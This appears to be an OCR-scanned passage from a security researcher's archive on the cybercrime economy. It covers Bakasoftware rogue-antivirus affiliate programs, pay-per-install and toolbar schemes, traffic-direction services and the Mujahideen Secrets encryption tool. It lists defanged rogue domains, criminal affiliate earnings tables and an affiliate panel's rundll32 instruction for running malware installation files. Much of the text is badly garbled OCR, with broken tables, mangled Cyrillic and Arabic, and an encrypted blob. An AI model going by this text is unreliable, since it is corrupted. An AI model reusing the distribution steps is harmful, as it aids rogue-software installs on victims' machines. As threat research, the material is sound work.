education and training. If it’s not, structural unemployment will undermine the local industry, 
you'll end up with software engineers working at the local McDonald’s during the day, and 
coding malware during the night - a stereotype. For instance, go through [2]this article and 
notice the quote regarding the attitude towards the U.S. Malware coders/generators aren’t on 
the verge of starvation, they’re on a mission with or without actually realizing it : 


"| don’t see in this a big tragedy," said a respondent who used the name Lightwatch. 
"Western countries played not the smallest role in the fall of the Soviet Union. But the 
Russians have a very amusing feature — they are able to get up from their knees, under any 
conditions or under any circumstances. As for the West? "You are getting what you deserve." 


It’s a type of "Why are you doing me a favour that | still cannnot appreciate?" issue, col- 
lectivism vs individualistic societies. E-crime is not just easy to outsource, but the entry 
barriers in space are so low, we can easily argue it’s no longer about the lack of capabilities, 
but the lack of motivation to participate, and actually survive, that drive E-crime particularly 
in respect to malware. From an economic perspective, the [3]Underground Economy’s high 
liquidity is perhaps the most logical incentive to participate, which is a clear indication on the 
[4]transparency and communication that parties involved have managed to achieve. 


1. ftp: / 7 4secure.con/#secure/pressroon/nevs/fenews 20080417 4_eng tall 
2, http://www. ah .com/articles/2007/10/20/europe/251evy. Php 
3. http: //ddanchev. blogspot . com/2007/03/underground- economys-supply- of -goods .html 
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BakaSoltware - Mozilla Firefox 
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BakaSoltware ~ Mozilla Firefox 
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x Homes BP Cmayruce DD leearuywee a oacgensts ace | CyHeTOn Rermctpa 
—_ # Os mam or 


Sample rogue and fraudulent domains known to have been involved in Bakasoftware- 
related campaigns: 


hxxp://av-xp-08.com 
hxxp://av-xp-2008.com 
hxxp://antivirusxp08.net 
hxxp://antivirusxp2008.net 
hxxp://antivirusxp-2008.net 
hxxp://antivirusxp-08.net 
hxxp://antivirus-xp-08.net 
hxxp://antivirus-xp-08.com 


hxxp://antivirusxp-08.com 
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hxxp://antivirusxp-2008.com 
hxxp://antivirxp08.com 
hxxp://avxp08.net 
hxxp://avxp-08.com 
hxxp://avxp-2008.com 
hxxp://avxp08.com 
hxxp://avxp2008.com 
hxxp://avxp-2008.net 
hxxp://antivirusxp08.com 
hxxp://antivirusxp2008.com 


hxxp://antivirusxp-2009.com 
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2009-03-01 - 2009-03-15 » Show 
User stats for period 2009-03-01 - 2009-03-15 : 
- Ratio Ratio 
Date Visits  Buypage Loads Sales (Uniq/Sales)  (Loads/Sales) Ch-backs Refunds Referals Sales Money 


2009-03-01 0 Q Qo 1:0 1:0 Qo Q 0.00 0.00 0 
2009-03-02 1 0 Qo Q 1:0 1:0 Qo Qo 0.00 0.00 0 
2009-03-03 2 0 Q Q 1:0 1:0 Q Q 0.00 0,00 0 
2009-03-04 1 0 0 Q 1:0 1:0 Qo 0 0.00 0.00 0 
2009-03-06 2 re) 703 | 2 4:1 1:351 Q Q 0.00 49.94 49.94 
2009-03-07 7019 643 4189 41 1:171 1:102 Q 1 0.00 998.80 998.8 
2009-03-08 5680 517 2489 «3 1:172 1:75 Q i 0.00 799.04 799,04 
2009-03-09 6999 553 3226 | 22 1:318 1:146 Qo 3 0.00 474.43 474.43 
2009-03-10 7818 506 3334 34 1:229 1:98 2 3 0.00 723.33 723.33 
2009-03-11 5357 359 2647 | 13 1:412 1:203 Q Q 0.00 32851 32851 
Total: 32880 2666 16588 145  1:226 1:114 2 8 0 3374.05 3374.05 
[16] 
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Members Area’! Installation Files 


in order for us to be able to track the installations you perform, you need to use an installation file which is 
tagged with your Affiliate ID (and, optionally, Tracking ID if you want to track installs for each of your sites 
individually). The tagging of the installation package is done automatically, so in order to get the 
installation files, you just need to specify Tracking ID (optional) and request them, by clicking the Request 
rs install Files button below. 


Report/Stats The installation files are available as either a .exe or a dil. 


Referr 


To install from DLL execute the following command: 
Payments rundli32.exe <«name_of_dil>.dll,Start 


The status of your requests can be seen below. Ifyou have problems with your Installation Files 


= —— downloading, ple ay per arTstaittorg 


Message Center 


ested Affiliate ID Tracking ID 
My Sales Person 


lation files 
stalation files 
ownload instalation files 


wnload instabation files 


8-04-08 05:10:13 182322 ownload instalation files 


Tracking ID (optiona):[ 
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2009-03-01 - 2009-03-15 » Show 
User stats for period 2009-03-01 - 2009-03-15 : 


Date Visits.» Buy page Loads Sales Gy tee) amisfeaes) Crbacks Refunds Referss Sales. Money 
2009-03-01 1 Oo QO QO 1:0 1:0 o 0 0.00 0.00 Oo 
2009-03-02 1 0 rf 0 1:0 1:0 Q 0 0.00 0.00 fy) 
2009-03-03 2 0 Q 0 1:0 1:0 Q Q 0.00 0.00 0 
2009-03-04 1 Oo QO Qo 1:0 1:0 Q Q 0.00 0.00 0 
2009-03-06 2 88 703 2 1:1 1:351 0 Q 0.00 49,94 49.94 
2009-03-07 7019 643 4189 41 1:171 1:102 Q 1 0.00 998.80 998.8 
2009-03-08 5680 517 2489-33 1:172 1:75 Q 1 0.00 799.04 799,04 
2009-03-09 6999 553 3226 22 1:318 1:146 Qo 3 0.00 474.43 474.43 
2009-03-10 7818 506 3334 34 1:229 1:98 2 3 0.00 723.33 723.33 
2009-03-11 5357 359 2647 13 1:412 1:203 Q Q 0.00 328.51 328.51 

Total: 32880 2666 16588 145 1:226 1:114 2 8 0 3374.05 3374.05 

[18] 
2009-03-01 - 2009-03-15 » Show 
User stats for period 2009-03-01 - 2009-03-15 : 

Date Visits. Buy page Loads Sales Qyi eye) omisfeaes) Crrbacks Refunds Referas Sales. Money 
2009-03-01 1 Oo QO QO 1:0 1:0 0 Q 0.00 0.00 0 
2009-03-02 1 0 rf 0 1:0 1:0 Q 0 0.00 0.00 0 
2009-03-03 2 0 0 0 1:0 1:0 Q Q 0.00 0.00 0 
2009-03-04 1 Oo Qo QO 1:0 1:0 Qo Q 0.00 0.00 0 
2009-03-06 2 88 703 2 1:1 1:351 0 Q 0.00 49,94 49.94 
2009-03-07 7019 643 4189 41 1:171 1:102 Q 1 0.00 998.80 998.8 
2009-03-08 5680 517 2489-33 1:172 1:75 Q 1 0.00 799.04 799,04 
2009-03-09 6999 553 3226 22 1:318 1:146 Q 3 0.00 474.43 474.43 
2009-03-10 7818 S06 3334 34 1:229 1:98 2 3 0.00 723.33 723.33 
2009-03-11 5357 359 2647 43 1:412 1:203 0 Q 0.00 328.51 328.51 

Total: 32880 2666 16588 145 1:226 1:114 2 8 0 3374.05 3374.05 
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Jlyywum na paM — JIYYLUMM OTApIx! 


— Yenosvn KOHKypca ron) 


Koreypc Anvtca 20 mene (C 16.06.2006 no 02.11.2008) 1 COCTOMT 13 MECKONDAHX STaNncE: 
- HERENbHEAA TOR 

Mecaunedl Ton 

O6ugA Tor 


Henemainit ton 


TOR COCTABRRETCR 13 BEGHACTEDOS, KOTOPRHE JADGGOT ANN MAKCHMAMHOE KONHECTIBO DEHET 38 NPO@ARUYIO HEREC (C 00.004 nomenenmHiHa 
Mo 24.00 socxpecerma). 


Oper vo 20 seGemctepce, sowequix 6 HeneteHed TON, NOmyuset Gonmycreet $150 x suunnate. NoGequte onpenenseTca Cayaaiinee 
C6pa00m. Ha SiLcash 1 SXLscfware Tome paqnenen, nooTcery $150 nomyerT Oty 10 BeGMaCTepos MANeMHOTO Toa Ha TXLcash 4 Quer 1 
seGuactepos Ha 3X1 software. 


Mecaureal ron 


[29] 


Spend money easy! 


3X 


4 i 


partnership 
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4.1.12 Mujahideen Secrets 2 Encryption Tool Released (2008-01-21 15:49) 


is GMO slonl 


aol 


Mojahedeen Secrets2 


Originally introduced by the [1]Global [2]lslamic [3]Media [4]Front (GIMF), the second version 
of the [5]Mujahideen Secrets encryption tool was released online approximately two days ago, 
on behalf of the Al-Ekhlaas Islamic Network. Original and translated press release : 


"Is the first program of the Islamic multicast security across networks. It represents the highest 
level of technical multicast encrypted but far superior. All communications software, which are 
manufactured by major companies in the world so that integrates all services communications 
encrypted in the small-sized portable. Release | of the "secrets of the mujahideen" the bulletin 
brothers in the International Islamic Front and the media have registered so scoop qualitatively 
in the field of information and jihadist exploit the opportunity to thank them for their wonderful 
and distinctive. And the continuing support of a media jihadist group loyalty in the technical 
development of a network of Islamic loyalty program and the issuance of this version, in support 
of the mujahideen general and the Islamic State of Iraq in particular." 


1276 


DH Spend money easy! 


3 "4 Paysites that do convert! 


JOIN NOW = SIGN UP HERE 


Bonus 


[32] 
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Horne 


WH Spend money easy! 


OxXt 


JOIN NOW= 


| 50, pane 
. 


60: Per sign up P For reffers! 
. © leenmee © Leen more © 


OT Npos@KN 3a pecbepana 


i 


{ Hosocts ( pacomncrumn ) 


06 TOvHOCHM Hamm 13EyYHeHHA IXLSOMNWate - 3TO TOFRKD CaMble CEQKHE NDOAYKTH APIA HOHEEDTS 


Vf AAEKBATHO PewaTs mode BONpOCbI 


a. ae 


Jiywwum napTHepaly’ — Ny4WwniA OTAbIX! 
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2009-03-01 - 2009-03-15 ») Show. 
Date Visits. Buy Loads Sales, Ratio Ratio Sg Py Pe Money 
| Sa peoe | _SaES  (Uniq/Sales) —_(Loads/Sdes) _ | 

7000-03-07 «472——i—(itSHLCktCi:736 1:280 Q Q 0.00 49.94 49.94 
2009-03-08 2883 «MS #461337 1411 1:199 0 Q 0.00 174.79 174.79 
2009-03-09 1793 = 88 468 0 1:0 1:0 0 Q 0.00 ~—-0.00 0 
2009-03-10 1050 S1 179 2 | 1:350 1:59 Q Q 0.00 74.91 74.91 
2009-03-11 484 24 76 r ial 1:242 1:38 Q Q 0.00 50.54 $0.54 

Total: 7682 358 2697 14 1:548 1:192 0 0 0 350.18 350.18 


Date Visits | Buy page Loads Sales (yyrfedes) oaterodies) Ch-backs Refunds Referds Sales Money 
2009-03-07 1472 Ss Sl 2. #2«&31736 | ~~ 1:280 Qo 0 | 0.00 49.94 49,94 
2009-03-08 2863 «4S-—(a§s «4303s 77 1:411 1:199 0 0 0.00 174.79 174.79 
2009-03-09 1793 88 488 «0 1:0 1:0 0 0 0.00 0.00 0 
2009-03-10 1050 51 179 3 ~—~——s«w1:350 1:59 0 Q 0.00 7491 74.91 
2009-03-11 484 24—Cd| «76 Od] 2 | ~é(hoae 1:38 0 0 0.00 S054 50.54 

Total: 7682 358 2697 14 1:548 1:192 o o 0 350.18 350.18 

[37] 


Show 


2009-03-01 - 2009-03-15 | 


Date Wists Buy page Loads Sales apiyedec) — (Loads/edes)  rbacks Refunds Refers © Sales. Money 
20003-07472 SO HL SC 8 Q 0 000 49.94 49.94 
2000-03-08 2883S ss 7 1411 1:19 0 ny 0.00 174.79 174.79 
20000309 1799 88 468 QO 1:0 1:0 Q ny 0.00 0.00 0 
2009-03-10 1050 S51 1799 «3 1:350 1:59 Q Q 0.00 7491 74.91 
2009-03-11 484 | me 1:242 1:38 Q Q 0.00 5054 S054 

Total: 7682 358 2697 14 1:548 1:192 0 0 0 350.18 350.18 
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[48] 


2008-03-08 


JUS -U3-U9 


2009-03-10 
2009-03-11 


Total: 


Ratio 
pdcecdll Mato Nac anal WO El ied Nc ried Rice Reni 
i a 1:0 1:0 Q 9 0.00 | 0.00 
2/0 f|silio|l wo | 1:0 Q 0 | 00 oo | O 
soo | 27 | 27/2 | 1502 | 1:267 Qo “Q 0.00 24.97 24.97 
[24 | 29 | gaz | a |  2:2m8 1:147 Qo Q 0.00 24.97 24.97 
S|] i |S i/o | 1:0 “Q “9 000 000 OO 
31 3 |[gigl 0 | 1:0 Q Q 0.00 000 O 
oe a a a | 1:0 | 1:0 Q Q | 00 ooo O 
16362 4200 1:187 “Q Q 000 9988 | 99.88 
[403 | 31 | ws | 3 | 1:13 1:38 Q 0 0.00 (7491 74.91 
[330 | 35 | yg. | 2 | 1:30 1:181 Q 0 | 0.00 | 25.27 | 25.27 
(2715 #167 1482 10 ~=©1:271 1:148 0 0 0 250 250 


Visits Buy page 
o| a |gmia 1:0 1:27 Q Q 0.00 74.91 74,91 
o| #« |gaolii 1:0 1:250 Q Qo 0.00 24.97 24.97 
oS. 5 tie | or 1:0 1:1 [ 9 0 000 49.94 49.94 
[ol « | @6 lg 1:0 1:0 Q Q 000 oF oO 
(oOo 69 33 6 1:0 1:55 0 0 0 14982 149.82 
[51] 
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Buy page Loads Sales ee, (Loadsjedes)  Crbacks Refunds Refers | Sales. Money 


Date —Vsits | 
poonsos oo Clk (ia 1:0 1:27 Q Q 000 7491 74.91 _ 
~ 2009-03-09 «0 *o (m2 .a/| 10 | 120 | o | O | 00 | 297 | 2497 | 
eS ee eC 2 en .  < 
2009-03-11 | O 4 qigQ 1:0 1:0 Q Q ooo0)600CCtC 
Total: 0 69 334 6 1:0 1:55 0 0 0 149.82 149.82. 
[52] 
(emote dk ears -—--— -] 
| Ratio Ratio 
Date sits Buy page Loads Sdes py des) (lomztedes) Grbacks Refunds Referab Ses. Money 
mouso9 ol CCl a CU 
2000-03-10 4764 «1x2 239s ias—“‘éiaktwF|C|€|CULCL CCD 
20000311 1479 105 = S7OtiSH—( (tC SCSC“‘“:SC#*C#C#SOSSCO#*#«+CO@W@O SCY OOMA23 | (241.23 
Total: 6243 237 2917 18 1:346 1:162 0 0 0 470.86 470.86. 
[53] 


| Q hy 
| 2 5 Q Q | 
2009-03-11 1479_— 105 S97 9g 1:164 1:66 Q Q 0.00 241.23 241.23 | 
Total 6243-237 2917 18 1346 1:162 0 0 0 470,86 470.86 — 
[54] 


12740 


[55] 


12741 


12742 


ADWARE : 
dollars 


= 115 per sate and more! $20 © You gererate 
100+ per day 

ee ee] 
more 

= HORLINE OLAS, NO there very detated 

= wre ghing ene the for promobon beter Ten pay. 
er anetat 

= CHATY rabio, COMWENS Ihe NO otter 

RONEN Y Day ROrts m0 Mead arryenore 


Affiliates 


Dens Shorey 


EASY CASH 


» PER SALE 


Resellers 


~ Specesl rates tor reseters 


- Start your Own DUSINESS TOM partner Shap with 
rere 


Contact va to learn more! 


Resellers 


Nectar Wri emescm 
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Main | Installs Stats | Live modules | Revenue Stats | Get EXE | Profile 


Date (2009.04.07) 


Payment period: from 2009-02-16 to 2009-04-07 


Revenue from your installs: 


Revenue from referrals: 
Total revenue: 


531.68$ 


41.9$ 
41.9$ 
573.58$ 
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search 


Ent 


We pay in 


Contact us 


ICQ! 703-6-666 


1cQ 


Mail: mail_adrsearch@geail.com 


GIMP Software == 
MOJAHEDEEN SECRETS 


Version 1.0 


Ant-Symmctric RSA Keys 


User ID Lenath | Creation 
Th Pub/Priy  Leell el el SC94BSFA 0 = 48 04112006 
Sobor’! all we 5D376133 = 048 )=—-09/11/2006 

ped yb] wb Lane py! qano1aep 4g nat12006 | 
496D920F (2048 0971172006 \s 


File Shredder ) | Recipient ID Recipient User ID 
~ L, KeyID [496D920F User ID [ps2 seul pate gi # Clear 
Keys Manager ) ee 
Symmetric Cipher Algonthm Stealthy Cipher | 
Gees ) [Rlindael with 256 bit key (AES) x) | © Activate Stealthy Cipher os 


Select File to Encrypt 
[C:4D ocuments and Setlings\Desktop\GIMF_ASRAR_PGP. bmp & Select... 


About) | 
| Exit ) | 


[ Wipe Out Original File (Permeneni file deletion lor ncreased security] 


Select File to Decrypt 


G Select... 


Compression: 1785.2% Cipher: Mars, Key size: 256 


abt! eS! tae y Ag 3 eI ot ew rel ete dl muy deed J! deri gl 1 -) 


Key features in the first version : 


- Encryption algorithms using the best five in cryptography. (AES finalist algorithms) 


- Symmetrical encryption keys along the 256-bit (Ultra Strong Symmetric Encryption) 


- Encryption keys for symmetric length of 2048-bit RSA (husband of a public key and private) 


- Pressure data ROM (the highest levels of pressure) 


- Keys and encryption algorithms changing technology ghost (Stealthy Cipher) 


- Automatic identification algorithm encryption during decoding (Cipher Auto-detection) 


- Program consisting of one file Facility file does not need assistance to install and can run from 
the memory portable 


- Scanning technology security for the files to be cleared with the impossibility of retrieving 
files (Files Shredder) 
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AVEC ASH Alli@ate Program 


Makes mcney with phages anet all? 


We have a new rates!! 


SIGNUP! Einmneaaes 


NOWAND 


com 


T STARTED 


[58] 


11-28-2006 


w update for SE 
p ready resources where 


Ad por traf and recerve 


after regstration 


Date Referal income | 
71000 24060 225/61 +-2.04 
2009.02.23 16/6 1:241 +.2.04 537.79 
2009.02.24 9635 3355 39/6 1:86 1,082.01 
2009.02.25 10282 3495 32/18 1108 B4355 
2009-02-26 10267 3623 39/10 1:92 1,101.97 
2009.02.27 11009 3454 16/9 1:95 1,218.76 
2009.02.28 10133 3193 756 1:86 $37.01 
2009.03.01 $244 3075 26/6 1:118 730.12 
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bakasoftware 


KaK ME KPYTE, 2 Y ac Renee a 


VIbHDBIE REHDIV 


AdvancedPtmer (o1paboran} 


Chena napone’ 


B UGARK GERONSCHOCT HL, MADON HD BOOK OKByWT OK Gunter eaeerewnd 
NapPohe HOMO NOMywTD 23ro CenTaipr @ ace y epede. chacHSo 30 Nonuieee. me padoToEH 
ame ear :) 


OReS 


Owe Uinamer — Gedtwe eee Gaalty Cathet ders ate - 
. share . ue soi 
= ‘ “seen ‘ ea . ent 
ou . Tang ou . #1 
ots . » SLA ana tan 
m - 4 2 . one ¥ 
u y ore mare mim ean . 1 een 
x“ . " La ' eo 
mt en Z = ~ ams un ett) xm 
“ . “ nh sven 
neta ‘ = we a aun ' renee 


Owe (reper Ged reper to = Geely Cot Cherie er fete Core -— 
= * ‘ es ue me 1 
an m “ee ‘ ean * 0 went 
— on tue eas . sleare “x 
" . = ier ‘ ana om eine 
oun “| Me e: one me . 
er) » - man mum ea . war (1 ones 
on . na sere ne 
ct ann Z ue sor Anan un “a 1 etnae 2m 
r * ‘ wr por hew sowone 
neta 2 ” = “er rs aus earaz ene 


[61] enc. "ms 
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(5) BestCash. 


e Waiinhiny bnates EA 
© Wade ch setup Meddl Hibbs f bbhbud edeeal 
0 bbid-ebbh Ae teen alemon 


9 bhcebdd sédaco: cabslbab! OdbectencecdA. cinuh bibas 
0 Alte 6 ASA MiB MUA D9b5e43, O1NEES itbablmedy A046tbb0 6 SOM D006 A CRUMRDLE RE 
SOME DDD co Sik Cb Ib cd REDS CANN Fm ARTIS ManbibbdbtG & ion 572209. 
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~ 


L(TDS) 


Anes 


L(TDS).biz The most convenient traffic directing system for af 
webmasters who trading with tops. The most important thing that 
you have to keep in mind is that we wil never cheat you. There bs 
no hkiden traffic maniputations from our side 


Server trne was changed to GMT +0 
From today you can buy traffic in your accourt easy 
Wew design and some features added 


U(TOS).be wes updeteditew feateres here (rus) 


Copyright © 2005-2007 L(TDs).ber 
Al rights reserved 
Server Time: Tha, 30 Oct 2008 72:16 GMT + 0 
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Ms | Litraffic) 


25.08.2008 20.11 


20.08.2008 09.51 


17.08.2008 10.08 - [Studi 265460G@frame) 50-806 4 554¢ leah Nodaid MidiGodade USA_GB.AU,CA DE... ebani 


dod iséch ikt-Sd Se0SMRRG shod | AAU bed emiseday!!! NOOxEINS IA 
NOANIBAINB #) 677-44-52 
Teta GMA 1008 8 6822 8 @ ws.ca deen pb Aicdorih bhGS24 6 BOOM Obted bdo hikee- et 
Sdaeddecade O55 af 108 & HOSSe See SEES 5-9-3-6-4-AkD- 1 
[Sitios COME Hen O085268 30-408 A S22 3S— 12 Tee ied 15 © US 10-15% 
DE 10% JP S% FR : atamd Addai Odterd Sandan 6585668 £ fodaiaL Tindiaiag 
Seibsey ICQ 66 4 

17.07.2008 19.26 - &deeh Shale 56 5506 id id caBSS 62 410 72] SSO id Metod ade 108 id BEES 

11.07.2008 12.29 - shikai O0452¢ Brame USA Absaa de2 244 8 whi ICQ 677-44-52 

26.06.2008 10.05 - IDIAAI drame 688508 USA DE_AU Abtaa I-dea adodili 56-054 385°936"471 

19.06.2008 18 Abééep bho UK(S7/Ik), AU(S9/ 1k), NZ(S11/Tk) S8a5522! [oer keANKES, epddy OHRSEAR ICQ 
4 3-47 

18.06.2008 07.33 - shinai dabad Qdadd2 Sdatddss 35 9 683 O02 

05.06.2008 12.28 - Edmp dadeod S836508, N&aaSaiP aebSeea + AbSaRA [Sdatierdiey 4 dtodd (307 -Be0-dd0and0-aki 
118) 

03.06.2008 17.39 - Eéeh DO Aaatd O605 & 108 & HOdEe ( Odi 105 ca 14) 8607850 A a> 470273531 

27.05.2008 11.37 - [Staiip abAdd “140 Cede” (MARANA odin 15 AMESS eroflach eu é aslanova ru Obed DG BAS 
(Gdidaé) Otek emia ICQ: 362625856 

26.05.2008 11.13 - [Sani frame 6685 AADITA_USA deed i844 ICQ 6774452 shod 


Aiehive 
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Six 


Ekhlaas Network 
MOJAHEDEEN SECRETS 


Version 2.0 


Anti-Symmetric Keys 


| Pub 16BE6840 ©2048 = 01/12/2007 
| Pub DFSD6B74 2048 06/12/2007 
> /PE Pub/Priv 64B21612 2048 06/12/2007 |— 
OE408966 2048 20/12/2007 + 


Encrypt File 


Decrypt File : 


| Sign / Verify 


te 
\ Messaging , ) 
eel 


E Remote User (Public Key) Key ID 


| [OE 408966 Gf Clear Key 


E Local User (Private Key) Key ID 


| [648 21612 fH Clear Key 


Symmetric Cipher Algorithm Stealthy Cipher 


|Riindael with 256 bit key [AES] v IV Activate Stealthy Cipher 


| File Shredder ) 


Preferences _) Select File to Encrypt Select File to Decrypt | File Encoding and Deco: | >| 
| About 

___ About) Path: |C:\Documents and Settings\Owner\Desktop\work, & Select... 7? 

( Exit ) [ Shred Out Original File. [ Sign Encrypted File. 


Compression: 79, 7% Cipher: RC6, Key size: 256 


New features introduced in the second version : 


- Multicast encrypted via text messages supporting the immediate use forums (Secure Messag- 
ing) 


- Transfer files of all kinds to be shared across texts forums (Files to Text Encoding) 
- Production of digital signature files and make sure it is correct 


- Digital signature of messages and files and to ensure the authenticity of messages and files 
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Cash 4 Toolbar is a one of a kind afihate program! There is no trafic that we cannot convert on 
With over rene years of combined expenence in the internet business we have bull a program that is 
Vilually one of the easiest ways to make money with You must have heard thes sentence many 
times before, but we tel you why ¢ is true with us. The way cur program works is that the surfer will 
S90 an active-x prompt and they chek yes @ wil install a toolbar on thee computer and you get 
paid! It's that simple. Ad the samme time you get recurring money and trafic back as well Many pay- 
perinatal programs yack afihate codes whech is the only way they can pay you, but wih us we 
eisure you no hyacking of afihate codes wil be Gone! We have worked on cur program for many 
months to make sure we can afford the rates we pay and # you don! bebeve us chck here to natal 
the toolbar and check your hosts Ge ce any fle whenever you wart and you wil see notheng of that 
son! We make our money with the toolbar, users stant page, as well as Cortestual pops 


With our program you get the following 
PERUNSTALL 


‘We wil pay you §0.15 per install for Untied States, United Kingdom, and Canada as well as $0.0! 
per mstall for all other countoes 


TOOLBAR LINKS 
When the user installs the toolbar @ wil carry your sponsor codes 25% of the tire so the more 
installs you get the more money you make with the toolbar dsl in the long nun 


TRAFFIC SACK 

When the surfer installs the toolbar they will also have a new Bookmark in thee favorites which wil 
9° 10 a website of your choice and the name as wel Over a period of tine you will ind yourself 
Qriling 2 Constant fow of trafic to help you grow your website with new viators all the time! 


REFERRING WEBMASTERS 
We wil pay you 10% of all commission made by webmasters you refer to Cath 4 Toolbar 


Our goal is clear and simple! We want you to make money from your tralic in a way you would never 
have thought of Sigeup ..get the code. put # on your website . start making money within seconds! 


Don't believe us? click here to signup and we will prove i to you! 


[75] 
12755 


12756 


ws™ 


A@? 


Lu 


ae rs nt Ot anes some 


a re  _ — 


* Login 
* Password 
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Start Making Money 
w/() video plugin installation Ne 


TDS, 
SignUP! Free ePASS ready site 


+ VISA CARD ,._ free contost 
We can make a new * enave many tree 
: epass account, if you Ey conten hee 
eet oy — % yours serfers! 


Copyright 2007 (c) CashCodec. All rights reserved 
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Start Making Money 
w |) video plugin installation ge 


TDS, 
SignUP! Free ePASS ready site 
*+ VISA CARD free content 
re We have many free 
We can make a new 7; 
epass account, if you Bate content, sites 
have earnedmore ri 


now and get 
started earn 
money today! 


Copyright 2007 (c) CashCodec. All rights reserved 
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Daily Reach (percent) 
vcst ats. com oxocash.com ruler-cash.com 
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Digital Signature 
Remote User (Public Key): _ SESE Key 1D: SSS? | WZ (ZH 
Local User (Private Key): ele w grill 5S 50 Key 1D: SSS eH * + 
Message to be Signed | Signed Message | Received Signed Message | RMSG Digital Signature | Sign and Verify Files | 
HB Clear | @& Load... | Passphrase: — | IV Mask 
ey! omy WU mate 


4ST gles Gude sell WI ola 13150) nal Seago ale Seah g Sala og clae | PU s dudedell Ole poli A doa 
[Foene] feSalas Sak, eSeecy a I Vaecd Gy} glad JIS corset ¢ Gator il dunes 


12-15 B3l poll Comall gg gpd Gal Weg Spell awe old olawall s 53 sill Ll gles AU US daales JEP 50 Hulett 


PE pI ISD pardinny GIS Coe cgutdl yl Leal yh col eure LS a2} ek of) 625 9 GUS Hal § p46 pyenty 
wind) Lede folSlly 5S oll ehwrd col! pets] gol al Sates «cle donadl | gle cl pol Soll Shins Mycl ale Loin 
ApAig Yo Bells dor as gpiel phe ydiell b ody 


Cte bells Mow yls S jal] Wy. 9Si sl 
rere) olay 

piel ges pra iees 

1428 /taodl ou? 


17/12/2007 
[edewwyll pled i He Len) dlvodl “pdhy 


[pt WU pil 5S 50] : pancrell 


So far, Reuters picked up the topic - [6]Jihadi software promises secure Web contacts 


"The efficacy of the new Arabic-language software to ensure secure e-mail and other com- 
munications could not be immediately gauged. But some security experts had warned that 
the wide distribution of its earlier version among Islamists and Arabic-speaking hackers could 
prove significant. Al Qaeda supporters widely use the Internet to spread the group’s state- 
ments through hundreds of Islamist sites where anyone can post messages. Al Qaeda-linked 
groups also set up their own sites, which frequently have to move after being shut by Internet 
service providers." 
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& DOGMA Hawa npoayKyna npogaeTca na moGoe rpadxpuxe! iy ees 
[ nanan 

Perncrpaiyts 

Ton Mac Tepos 


FAQ 


| Ton BeOmactrepos 


. — Veena taenee Weect ance Neoneme 
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eRevenue.com 


Tired with your day job? 


Become our affiliate and earn 100$ a day or more 


avenue th a pay per-initad affiiate program: we pay you every time 
br sofbeare 6 run on 2 tindoes PC, The more computers you estat ow 


component on, the more you earn. Learn more. 


wheter you are & software Geveloper OF ne, we The cove of CeeRewenut is powerfu Quackiunde™ wee (Aner GPOgr ans, we pay for MLL CoMmtries 
ook forward to working with you. Sign up tocay techeciogy, which uttize: » mutual agreemest ie the world. The rates wary Gepending on site 


10 get the mast of your trafic, sere betwee the user and ExeReverne tore and the Quatity Of your traffic. More 
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ExeRevenue.com 


Tired with your day job? 


Kia arornens 
me sotteare is run on & Window 
| icon | mporeet on, the more you earn 


Join our Program 


[92] 
2008-10-21 9 7H 1845 972 0017 02.91% $16.506 
2008-10-22 ° ) 12350 736 0.0178 54.52% $13.074 
2008-10-23 1 13244 ° 20631 0.0195 o% $519,728 
2008-10-24 0 $2 22269 13129 0.0205 58.96% $268.556 
2008-10-25 1 1733 18911 7899 0.0221 49.64% $174,222 
2008-10-26 0 16 12634 7658 0.0194 60.61% $148.936 
2009-02-07 9 ° 4041 1004 Ooms 24.85% $11.861 
2003-02-08 i] o 3970 838 0.0076 21.11% $6.33595 
2009-0209 9 2 3871 942 0.0088 24.33% $8.2826 
2009-02-10 ° ° 5586 861 0.0091 15.41% $7.86245 
2009-02-14 ° 1 3262 960 0.0082 29.52% $8.86425 
2009-02-15 9 1 494 303 0.0086 24.45% $7.77925 
2008-02-17 0 2 77 764 0.0117 24.82% $8.91376 
2009-02-18 0 ° 2374 615 0.0102 20.08% 36.2054 
2003-02-20 0 ° ° 42 0.0082 o% 30.3438 


55960 1220315 573127 , $10077 43567 
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: Papert 10% Draet Referls - 3% tndrect Retenss 
* free Contant Induding Clip Art. loons, Ohoter, © Wallpaper! 


Jou Today, ated pour fest hack wil aevtve within 40 dope! 
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Secure MWe: 


ra Php Tag 


A Clear | GS Copy | > Left Tag 


[PHP] 

### Begin ASRAR El Mojahedeen v2.0 Encrypted Message #H## 

FF94cUFAWEYNmNjODc2MT dlOGVIMDM4MmU0Y 202 jg2ZilmMzk1ZmlxM2N mNWE SN TZk2 
GJIMVEDO1MzBiYz4yMDVhMTN2ZWJZiO 5SNGRZINIMmlsN TEYNjk2N2ImNWZ2D 4 Midi 
kMTBiNza2NWwRINmG 3MDAxNDO2NGRZIhbNZY4N2JkYjo1 NijM3MmG5NGUOMmYkMGJmND 
M20 TEx Wij mlzM2E pOWNhYTUsxOT MwZDNkKMDEwNzRlyzMeNzMwimMyNPkyi]GwN2Biy 
WNINmYwMGUpY WROD hmZmG02mUx2Zj|U4NTYwOTFiMDM1IMTU2NTMxNzk4NnicwOWOy0 
WNiZDM52TUpNGM5SMmyy2mE 20 TMwOGOx00052GM20'WI3MjdINjM3N2U52 TIiN'WY¥mNjE 
1Ywi2/wO0ZGQONDFKNZY3YTkKSMDkwNjFRY fy wM 20 27 20'\Wi mM zqyM2ZIND BI jhhzw 
EzMDISZZTJmOGMOYTBOT coMWYINTY2ZTU2ZZG0072FkYjExNDUIM2Y5MiMy2ZT hkZG022T 
E1ZT cxMjc2zNTU2N TIIMmE w2TIhNjFIN'WE 4 mJhbN2UpND dmO TiN TIN TAZY2E OMG iM WY 
zk2zN2Q5NWil2MDc2yj4x2jU1 OT g I NTZIMTOINDY4YUkY2NiMjE 4M 2U22T|ZT o5Mz0w2wO3 
NTQYNTRbA3*1 NSO OY 3jhe¥G Buk Hin inkLi65js1 dG¥nJyYO1 nFXgw's5infillcyVHABD zpstjiZ8 
JT6¥spiUdEVrUpDCNMbARPYTkD2fQKgMlsO2H2vZmd0 sNDN4MIFO cnRizthiN p6HSPFSPSeq¥ 
zsOlpwOzMuE w28b3w/OsqC8qcB hxbfdgUB 4njfohBnk ?KyuCFFznez5Pyhe r4jR PSA Gel tsma?y 
4cdw /cilGGKPnFySIkEO+dBREU+bKfY6q¥ 4bg+/Rl2WbO Sn/bSWzBakp2SNG2WagsNItkping 
Whsa?mLrS1+F6n65FF65nbO%2/1 rT EpbyLnXxOKU6x/DSUUN I GiGyDKAY vygoRrBYxpt?T U1YNg 
thei jBSYD bCdGHEgLLebmihm3bwiEAWryiqgvDROgR2dT M/pfUuRIMAfwev4Chs Cywjw2x6t 
